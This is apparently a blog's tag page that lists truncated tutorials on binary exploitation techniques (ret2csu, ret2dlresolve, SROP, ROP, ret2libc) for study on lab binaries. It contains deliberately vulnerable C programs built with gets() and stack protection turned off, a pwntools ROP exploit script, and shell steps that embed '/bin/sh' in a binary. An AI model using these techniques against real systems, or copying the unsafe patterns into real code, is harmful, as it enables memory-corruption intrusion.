Articles tagged exploit

ret2csu

Vulnerable program

#include <stdio.h>

int win(int x, int y, int z) {
    if(z == 0xdeadbeefcafed00d) {
        puts("Awesome work!");
    }
}

int main() {
    puts("Come on then, ret2csu me");
    char input[30];
    gets(input);
    return 0;
}

Exploitation analysis

Conventional exploitation: overflow the buffer to control rip so that it points at a gadget; the gadget is responsible for calling win.

Exploit code:

from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
log.info(f'win addr is : {hex(elf.sym.win)}')
offset = 40
rop = ROP(elf)
rop.raw(offset * 'a')
rop.win(0,0,0xdeadbeefcafed00d)
p.recv()
p.sendline(rop.chain())
result = p.recvline()
log.info(result)

The code above assumes that suitable gadgets exist to build the chain, but in practice……

Read full article

ret2dlresolve

Overview: Using ret2dlresolve, an attacker can induce the binary to resolve a chosen function (such as system) into the PLT. A dynamically linked ELF object imports libc functions on first use through PLT and GOT calls. While relocating a runtime symbol, RIP jumps to the PLT and attempts to resolve that symbol. During this process, a "……

Read full article

SROP

SROP: Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. See [1] for details.

Vulnerable program

The vuln program:

from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
    '''
    mov rdi, 0;
    mov rsi, rsp;
    sub rsi, 8;
    mov rdx, 500;
    syscall;
    ret;
    pop rax;
    ret;
    ''',
    vma=0x41000
)
elf.save('vuln')

└─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2
#define __NR_rt_sigreturn 15
#define __NR_ioctl 16
#define __NR_pread64 17

Embed the /bin/sh string

┌──(kali㉿kali)-[~/exploits/srop]
└─$ echo -en "/bin/sh\x00" >> vuln
┌──(k……

Read full article

ROP

ROP: Return-oriented programming defeats the W⊕X protections recently deployed by Microsoft, Intel, and AMD; in this context, it can be seen as a generalization of traditional return-into-libc attacks. But the threat is more general.

gadget

What is a gadget: Each gadget is an arrangement of words on the stack, both pointers to instruction sequences and immediate data words, that when invoked accomplishes some well-defined task.

"W⊕X" ensures that no memory location in a process image is marked both writable ("W") and executable ("X").

Gadget feature: One gadget might perform a load operation, another an xor, and another a conditional branch.

Example program

from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
    '''
    mov rdi, 0;
    mov rsi, rsp;
    sub rsi, 8;
    mov rdx,……

Read full article

ret2libc

ret2libc: When a program is built with NX protection, traditional shellcode placed on the stack cannot be executed, so it cannot be used to get a shell; the ret2libc technique can be used instead.

Vulnerable program

#include <stdio.h>

void vuln() {
    char buffer[64];
    puts("Overflow me");
    gets(buffer);
}

int main() {
    vuln();
}

gcc vuln.c -m32 -fno-stack-protector -no-pie -o vuln-32

└─$ checksec --file=./vuln-32
[*] '/home/kali/exploits/ret2libc/vuln-32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Exploitation plan

Point eip directly at system('/bin/……

Read full article